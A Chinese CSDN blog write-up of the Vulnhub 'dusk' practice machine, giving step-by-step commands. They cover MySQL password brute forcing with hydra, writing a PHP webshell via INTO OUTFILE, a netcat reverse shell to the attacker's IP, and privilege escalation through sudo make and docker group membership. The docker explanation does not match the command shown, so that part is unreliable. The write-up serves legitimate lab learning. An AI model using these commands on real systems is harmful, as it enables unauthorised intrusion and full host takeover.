dusk 靶机

最新推荐文章于 2024-10-01 16:35:38 发布
最新推荐文章于 2024-10-01 16:35:38 发布
阅读量82 收藏
点赞数
分类专栏: 渗透测试 文章标签: android linux 笔记 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51559599/article/details/134138431
版权

dusk

信息搜集

存活检测

image-20231031113746932

详细扫描

image-20231031114114581

扫描出以下开放端口

image-20231031114135407

后台网页扫描

image-20231031113917997

网页信息搜集

image-20231031114207611

查看开放的 8080 端口

可知工作路径在 /var/tmp 下

image-20231031114259066

继续进行信息搜集,未发现有用信息

反弹 shell

尝试爆破数据库

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://10.4.7.158:3306

成功爆破出密码 password

image-20231031114729000

数据库登录

image-20231031114945824

查看MySQL服务器的安全相关的配置变量

show variables like '%secure%';

secure_file_priv为空,可以读取磁盘的目录。

image-20231031115109627

向目录 /var/tmp 下写入一句话木马

select "<?php system($_GET['cmd']);?>" into outfile "/var/tmp/backdoor.php";

image-20231031131840892

写入的 php 文件可以成功访问

image-20231031131910601

kali 开启 nc 监听

image-20231031131421809

url 输入连接命令

http://10.4.7.158:8080/backdoor.php?cmd=nc -e /bin/bash 10.4.7.146 8888

image-20231031132035685

成功反弹

image-20231031132102352

提权

sudo -l 查看 root 权限

image-20231031132503301

dusk 用户可以无密码使用 sudo make

make 提权命令

COMMAND='/bin/sh'
sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"

成功提权到 dusk

image-20231031132709766

发现 duck 在 docker 组内

image-20231031132822252

提权

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

成功提权

image-20231031133636711

将文件夹挂载到mnt文件夹

在容器中运行 Alpine 镜像,并将主机的 /root 目录挂载到容器的 /mnt 目录。

具体来说,命令的各个部分的含义如下:

  • docker run:运行一个 Docker 容器。

  • -it:创建一个交互式的终端会话,并分配一个伪终端。

  • -v /root:/mnt:将主机的 /root 目录挂载到容器的 /mnt 目录。

    容器中的 /mnt 目录将显示主机中 /root 目录的内容,并且对 /mnt 目录的更改将反映在主机的 /root 目录中。

  • alpine:指定要运行的容器镜像,这里是 Alpine 镜像。

    alpine 容器提供了一个基于 Alpine Linux 的最小化运行环境

通过这个命令,可以在 Alpine 容器中访问和操作主机上的 /root 目录中的文件和目录。

总结

  • 数据库写入
  • docker 提权
gjl_
关注
专栏目录
vulnhub靶机dusk
timesleep的博客
12-24 351
我们的kaliIP为192.168.34.175 靶机IP192.168.34.170 首先我们扫描端口 信息收集 ftp 登录失败 然后发现8080有东西我们觉得入手点在这里 然后我们扫描目录 我们发现什么的没有 在看端口我们下一个就应该是3306 这是我们mysql可能用到的用户 hydra -l root -P /root/Desktop/work/zd/rockyou.txt ...
vulnhub靶机dusk-Writeup渗透测试
Long_gone的博客
12-24 822
一、信息搜集 打开靶机后还是先确定靶机IP: arp-scan 192.168.34.0/24 我的靶机IP为:192.168.34.170,然后扫描一下它的端口开放情况: nmap 192.168.34.170 发现它开放的端口还是挺多的,先看一下80端口: 没什么用,再访问一下8080端口看看: 从这个页面的得到的有用信息就一个:Local working directory:/v...
vulnhub靶场,dusk
kukudeshuo的博客
09-20 244
vulnhub靶场,dusk 环境准备 靶机下载地址:https://www.vulnhub.com/entry/sunset-dusk,404/ 攻击机:kali(192.168.109.128) 靶机dusk(192.168.109.180) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.180 使用nmap扫描查看目标靶机端口开放情况 ..
Dusk靶机渗透实战-vuluhub系列(十)
PANDA墨森的博客
07-09 678
这是vulnhub靶机系列文章的第十篇,本次主要知识点为:mysql 3306端口爆破、sql-shell写webshell、nc反弹shell、sudo滥用提权之-make、docker命令 靶机下载链接:https://www.vulnhub.com/entry/sunset-dusk,404/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13223131.html #001 环境搭建(nat) 攻击机kali:192.168.136.129 靶机Du
vulnhub靶机-sunset:dusk
臭nana的博客
07-18 1066
1、获取靶机ip:192.168.0.127 nmap -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -p- -A 192.168.0.127 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.127 Host is up (0.00097s latency). Not shown: 65529 closed ports PORT STATE SER
dusk
03-19
Laravel Dusk提供了一个易于使用的表达性浏览器自动化和测试API。默认情况下,Dusk不需要您在计算机上安装JDK或Selenium。相反,Dusk使用独立的Chromedriver。但是,您可以自由使用您希望使用的任何其他Selenium驱动...
testbench-dusk:[软件包] Laravel Dusk软件包开发的测试助手
03-19
Laravel Dusk软件包开发的测试助手 Testbench Dusk组件是一个简单的软件包,可以帮助您使用Laravel Dusk为Laravel软件包编写测试。 该软件包是由开发的,转移到Orchestra名称空间,在将来我们将为它提供支持。它仍...
DuSK 3D-开源
04-27
DuSK 3D是一种类似于地震串行游戏引擎的游戏引擎。 如今,它使用quake3的游戏数据(地图,纹理,声音等)。 它将具有取代Quake3引擎(quake3.exe)的全部功能,并支持Quake3的游戏逻辑dll,例如ui.dll,cgame.dll,
Laravel Dusk 浏览器测试更优雅
coder for php 的博客
03-08 2174
欢迎大家关注我的其他<a href ="https://webff.github.io" >Github博客</a>和<a href ="http://www.jianshu.com/u/a9f9d36ab057">简书</a>,互相交流!
Vulnhub靶机Wakanda渗透测试攻略
大方子
11-18 4671
百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导入Wakanda_1.ova靶机环境,修改其网络连接方式为Bridged(桥接网卡),并选择一个可用于联网的网卡(例如,我使用的无线网卡上网,在图中网卡为Inter(R) Dual Band Wireless-...
Android 14源码分析】WMS-窗口显示-流程概览与应用端流程分析
隔壁小王的博客
09-30 742
WMS 负责管理设备上所有的 Window ,所以应用想显示一个 Window 则要通过 WMS 来完成。而 WMS 毕竟还是上层,窗口的内容要显示到屏幕上,还需要 SurfaceFlinger 来处理。应用端: 控制其内部的窗口的添加及 UI 绘制逻辑WMS 模块: 作为系统窗口管理模块,处理应用端的窗口显示逻辑应用端与 WMS 通信通过匿名 Binder -> Session 完成。
windows10使用bat脚本安装前后端环境之msyql5.7安装配置并重置用户密码
风吹淡了悲伤
09-27 486
mysql-user-init.sql:重置root密码(并新增zhangsan用户授予权限)adserver-simple.sql:创建数据库sql脚本。5.启动并修改root密码(新增用户初始化授予权限)2.新增data文件夹与my.ini配置文件。1.下载mysql5.7 zip格式安装包。4.安装mysql windows服务。
AndroidStudio】关于AndroidStudio的常见控件TextView和Button
PleaSure乐事的博客
09-26 405
AndroidStudio中TextView和Button控件的使用
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 517
PHP反序列化2(OC绕过.wakeup绕过)
Android常用C++特性之std::unique
Android-Graphics&Display
09-27 356
你可以通过提供自定义的谓词来定义 "相等" 的标准。// 使用自定义谓词来移除相邻绝对值相等的元素});// 使用 erase 减少容器大小// 打印结果return 0;是一个用于移除相邻重复元素的算法。它通过重新排列容器中的元素,将不需要的重复元素移动到末尾,并返回新的末尾位置。如果想要实际移除元素,需要结合erase函数。如果容器中存在非相邻的重复元素,通常需要先使用std::sort对容器进行排序。
android-webview播放video标签黑屏谈起
yeshen.org
09-27 382
webview video 黑屏
Android Camera2 与 Camera API技术探究和RAW数据采集
最新发布
乐学吧
10-01 766
Android Camera2 API 是从 Android 5.0(Lollipop)开始引入的,相对Camera API,优势非常明显,如果需要通过Android平台采集视频数据,在设备支持的前提下,建议尽可能用Camera2做数据采集。
Android 14源码分析】Activity启动流程-1
隔壁小王的博客
09-29 1232
执行 startActivity 方法的 Activity ,也就是发起请求的Activity ,当前是 Launcher 的 Activity。:被启动的 Activity 当前就是“电话”应用在清单文件配置的MainActivityAMS: 不仅仅是指 AMS 这一个类,而是指在这个过程中 system_service 进程参与处理的相关类。
将pandas dataframe 转化成dusk dataframe
05-08
Dask是一个并行计算框架,它可以扩展到单个计算机或分布式集群上,以处理比RAM更大的数据集。Dask Dataframe是一种基于pandas的分布式数据结构,可以让你使用与pandas相同的API来操作大型数据集。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值